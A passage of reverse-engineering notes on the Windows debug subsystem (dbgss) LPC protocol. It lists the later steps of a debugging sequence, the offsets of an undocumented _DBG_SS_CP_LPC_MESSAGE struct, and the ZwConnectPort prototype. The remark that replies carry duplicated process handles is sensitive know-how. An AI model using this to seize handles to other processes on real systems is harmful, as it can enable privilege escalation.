4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT (WaitForDebugEvent).
Message contains duplicated handle(s).
5. When debugger's thread terminates(e.g. on logoff), Target process or thread is
terminated too (like it was regularly debugged).
struct _DBG_SS_CP_LPC_MESSAGE {
USHORT DataSize; //00
USHORT MessageSize; //02
USHORT MessageType; //04
USHORT VirtualRangesOffset; //06
DWORD CallerPid; //08
DWORD CallerTid; //0C
ULONG MessageId; //10
ULONG SectionSize; //14
DWORD dwSsDebugEventCode; //18
DWORD Status; //1C
DWORD DebuggeePID; //20
DWORD DebuggeeTID; //24
PVOID pDbgSsKmMsg; //28 //size ~ 0x78
DWORD DebuggerPID; //2C
DWORD DebuggerTID; //30
DWORD Unknown34; //34
DWORD hFile; //38
LPVOID lpBaseOfImage; //3C
DWORD dwDebugInfoFileOffset;//40
DWORD nDebugInfoSize; //44
LPVOID lpThreadLocalBase; //48
LPTHREAD_START_ROUTINE lpStartAddress; //4C
LPVOID lpImageName; //50
WORD fUnicode; //54
WORD ImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56)/sizeof(WORD)]; //56 pro forma
}
MAX_DBG_SS_CP_LPC_MESSAGE_SIZE = 80h
NTSYSAPI NTSTATUS NTAPI ZwConnectPort (
OUT PHANDLE ClientPortHandle,
IN PUNICODE_STRING ServerPortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PLPC_THIS_SIDE_MEMORY ClientSharedMemory OPTIONAL,
IN OUT PLPC_OTHER_SIDE_MEMORY ServerSharedMemory OPTIONAL,
OUT PULONG MaximumMessageLength OPTIONAL,
IN OUT PVOID ConnectionInfo OPTIONAL,
IN OUT PULONG ConnectionInfoLength OPTIONAL
);